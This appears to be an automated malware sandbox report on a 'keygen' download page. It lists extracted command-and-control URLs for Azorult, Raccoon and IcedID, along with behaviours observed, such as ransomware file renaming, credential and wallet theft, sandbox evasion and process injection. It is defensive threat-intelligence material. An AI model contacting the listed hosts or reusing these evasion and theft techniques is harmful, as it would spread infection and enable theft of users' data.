Resubmissions
10-04-2021 05:28    210410-642g16c6y6    10
09-04-2021 16:57    210409-a3zwd3zjvx    10
09-04-2021 05:30    210409-4qr2p4p1m6    10
Analysis
max time kernel     1147s
max time network    1149s
submitted           01-01-0001 00:00
Static task       static1
URLScan task      urlscan1       Sample  https://keygenit.com/d/30f8668638112r4p2203.html
Behavioral task   behavioral1    Sample  https://keygenit.com/d/30f8668638112r4p2203.html    Resource  win10v20201028
Behavioral task   behavioral2    Sample  https://keygenit.com/d/30f8668638112r4p2203.html    Resource  win10v20201028
Behavioral task   behavioral3    Sample  https://keygenit.com/d/30f8668638112r4p2203.html    Resource  win10v20201028
General
Target      https://keygenit.com/d/30f8668638112r4p2203.html
Malware Config
Extracted              http://labsclub.com/welcome
Extracted              C:\_readme.txt
                       https://we.tl/t-KjQSp1t0OY
Extracted   azorult    http://kvaka.li/1210776429.php
Extracted   raccoon    a6bfe7e504db71e25642b830fd9b2c4366cf882a
            url4cnc    https://telete.in/j90dadarobin
Extracted   icedid     1925120085
Signatures
Azorult
An information stealer first discovered in 2016 that targets browsing history and passwords.
DcRat
DarkCrystal (DC) is a new .NET RAT, active since June 2019, that can load additional plugins.
ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description               pid     Process         procid_target
PID 6652 created 8852     6652    WerFault.exe    596
Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs
description               pid     Process         procid_target
PID 4756 created 5252     4756    svchost.exe     189
PID 4756 created 6228     4756    svchost.exe     297
PID 4756 created 7564     4756    svchost.exe     512
PID 4756 created 7268     4756    svchost.exe     559
PID 4756 created 9868     4756    svchost.exe     592
PID 4756 created 8704     4756    svchost.exe     618
PID 4756 created 5812     4756    svchost.exe     643
PID 4756 created 10956    4756    svchost.exe     680
Checks for common network interception software 1 TTPs
Looks in the registry for tools such as Wireshark or Fiddler that are commonly used to analyze network activity.
Blocklisted process makes network request 28 IoCs
Downloads MZ/PE file
Drops file in Drivers directory 5 IoCs
description                     ioc                                          Process
File opened for modification    C:\Windows\system32\drivers\etc\hosts        ysAGEL.exe
File opened for modification    C:\Windows\System32\drivers\SETCC1B.tmp      DrvInst.exe
File created                    C:\Windows\System32\drivers\SETCC1B.tmp      DrvInst.exe
File opened for modification    C:\Windows\System32\drivers\tap0901.sys      DrvInst.exe
File opened for modification    C:\Windows\system32\drivers\etc\hosts        alpATCHInO.exe
Executes dropped EXE 64 IoCs
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
description                     ioc                                                                                              Process
File renamed                    C:\Users\Admin\Pictures\InvokeRequest.tif => C:\Users\Admin\Pictures\InvokeRequest.tif.lmas      9C8.exe
File opened for modification    C:\Users\Admin\Pictures\FindAdd.tiff                                                             9C8.exe
File renamed                    C:\Users\Admin\Pictures\GrantClose.tiff => C:\Users\Admin\Pictures\GrantClose.tiff.lmas          9C8.exe
File opened for modification    C:\Users\Admin\Pictures\GrantClose.tiff                                                          9C8.exe
File renamed                    C:\Users\Admin\Pictures\MountDisable.png => C:\Users\Admin\Pictures\MountDisable.png.lmas        9C8.exe
File renamed                    C:\Users\Admin\Pictures\RenamePublish.raw => C:\Users\Admin\Pictures\RenamePublish.raw.lmas      9C8.exe
File renamed                    C:\Users\Admin\Pictures\ResizeRename.png => C:\Users\Admin\Pictures\ResizeRename.png.lmas        9C8.exe
File renamed                    C:\Users\Admin\Pictures\CompleteSelect.png => C:\Users\Admin\Pictures\CompleteSelect.png.lmas    9C8.exe
File renamed                    C:\Users\Admin\Pictures\FindAdd.tiff => C:\Users\Admin\Pictures\FindAdd.tiff.lmas                9C8.exe
Checks computer location settings 2 TTPs 10 IoCs
Looks up the country code configured in the registry, likely for geofencing.
description          ioc                                                                                                   Process
Key value queried    \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation    Weather.exe
Key value queried    \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation    setups.tmp
Key value queried    \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation    setups.tmp
Key value queried    \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation    keygen-step-4.exe
Key value queried    \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation    setups.tmp
Key value queried    \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation    setups.tmp
Key value queried    \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation    BTRSetp.exe
Key value queried    \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation    keygen-step-4.exe
Key value queried    \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation    setups.tmp
Key value queried    \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation    Weather.exe
Loads dropped DLL 64 IoCs
Modifies file permissions 1 TTPs 4 IoCs
pid     Process
8628    icacls.exe
8308    icacls.exe
5272    icacls.exe
4124    icacls.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs such as FileZilla.
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk, where infostealers often target it.
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials and similar sensitive data.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 26 IoCs
Checks for any installed AV software in registry 1 TTPs 64 IoCs
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
description          ioc                                                                                   Process
Key value queried    \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA    md2_2efs.exe
Key value queried    \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA    md2_2efs.exe
Key value queried    \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA    Weather.exe
Key value queried    \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA    jg8_8qyu.exe
Key value queried    \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA    7BEF.tmp.exe
Drops Chrome extension 1 IoCs
description     ioc                                                                                                                              Process
File created    C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json    askinstall20.exe
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow    ioc
1135    api.2ip.ua
1172    api.ipify.org
1227    api.2ip.ua
374     ip-api.com
404     ipinfo.io
1175    ipinfo.io
213     ipinfo.io
216     ipinfo.io
256     ip-api.com
413     ipinfo.io
830     ipinfo.io
945     api.ipify.org
1020    ipinfo.io
1136    api.2ip.ua
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description          ioc                                                            Process
Key opened           \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum      multitimer.exe
Key value queried    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0    multitimer.exe
Drops file in System32 directory 23 IoCs
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid     Process
8140    Conhost.exe
7848    mask_svc.exe
3856    mask_svc.exe
Suspicious use of SetThreadContext 19 IoCs
description                             pid     Process              procid_target
PID 3644 set thread context of 4968     3644    svchost.exe          163
PID 6460 set thread context of 6528     6460    RunWW.exe            224
PID 6676 set thread context of 4608     6676    XOoRXgN90WGr.exe     363
PID 5244 set thread context of 4392     5244    5241308.exe          402
PID 6760 set thread context of 5656     6760    Infinita.exe.com     440
PID 7940 set thread context of 2172     7940    Cio.exe.com          463
PID 6800 set thread context of 4012     6800    key.exe              476
PID 3968 set thread context of 7920     3968    keygen-step-2.exe    484
PID 5076 set thread context of 9144     5076    111.exe              613
PID 7696 set thread context of 8544     7696    7BEF.tmp.exe         578
PID 8024 set thread context of 9252     8024    app.exe              580
PID 8024 set thread context of 9556     8024    app.exe              635
PID 9596 set thread context of 8384     9596    timeout.exe          636
PID 5864 set thread context of 9028     5864    2DDB.tmp.exe         637
PID 5896 set thread context of 10072    5896    2BB7.tmp.exe         639
PID 5864 set thread context of 6072     5864    2DDB.tmp.exe         650
PID 8912 set thread context of 10572    8912    libmfxsw32.exe       667
PID 584 set thread context of 5468      584     libmfxsw32.exe       669
PID 4024 set thread context of 10428    4024    libmfxsw32.exe       682
Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 39 IoCs
description | ioc | Process
File opened for modification | C:\Windows\INF\setupapi.dev.log | DrvInst.exe
File opened for modification | C:\Windows\inf\oem2.inf | DrvInst.exe
File created | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new | multitimer.exe
File created | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new | multitimer.exe
File opened for modification | C:\Windows\Installer\f756a25.msi | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI8FE6.tmp | msiexec.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | DrvInst.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File created | C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} | msiexec.exe
File created | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new | Geqymilace.exe
File created | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new | Geqymilace.exe
File opened for modification | C:\Windows\Installer\MSI14C4.tmp | msiexec.exe
File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | WerFault.exe
File created | C:\Windows\Installer\f756a25.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI7716.tmp | msiexec.exe
File created | C:\Windows\Tasks\.job | aipackagechainer.exe
File created | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new | multitimer.exe
File opened for modification | C:\Windows\Installer\MSI6EA9.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI77B4.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI8CE5.tmp | msiexec.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | jfiag3g_gg.exe
File opened for modification | C:\Windows\Tasks\.job | svchost.exe
File created | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new | multitimer.exe
File opened for modification | C:\Windows\Installer\MSI7A17.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI8DC1.tmp | msiexec.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | svchost.exe
File created | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new | multitimer.exe
File created | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new | multitimer.exe
File opened for modification | C:\Windows\Installer\MSI7B41.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI91DC.tmp | msiexec.exe
File created | C:\Windows\INF\oem2.PNF | DrvInst.exe
File created | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new | multitimer.exe
File created | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new | multitimer.exe
File opened for modification | C:\Windows\Installer\MSI7756.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI8EAC.tmp | msiexec.exe
File created | C:\Windows\inf\oem2.inf | DrvInst.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 2 IoCs
pid | pid_target | Process | procid_target
2164 | 7920 | WerFault.exe | 484
6652 | 8852 | WerFault.exe | 596
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Phantom | DrvInst.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters | DrvInst.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID | taskkill.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs | jfiag3g_gg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 6762a766.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 | jfiag3g_gg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 | DrvInst.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags | jfiag3g_gg.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\LowerFilters | DrvInst.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 6762a766.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom | DrvInst.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service | DrvInst.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | svchost.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 6762a766.exe
Checks processor information in registry 2 TTPs 16 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | RunWW.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | RunWW.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wwfvd.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Weather.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 2BB7.tmp.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 5.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 5.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | wwfvd.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Weather.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 7BEF.tmp.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 7BEF.tmp.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | DC30.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | DC30.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 2BB7.tmp.exe
Delays execution with timeout.exe 10 IoCs
pid | Process
7240 | timeout.exe
9596 | timeout.exe
6572 | timeout.exe
6012 | timeout.exe
5724 | timeout.exe
5492 | timeout.exe
8432 | timeout.exe
3952 | timeout.exe
3444 | timeout.exe
7064 | timeout.exe
Enumerates system info in registry 2 TTPs 5 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | multitimer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | multitimer.exe
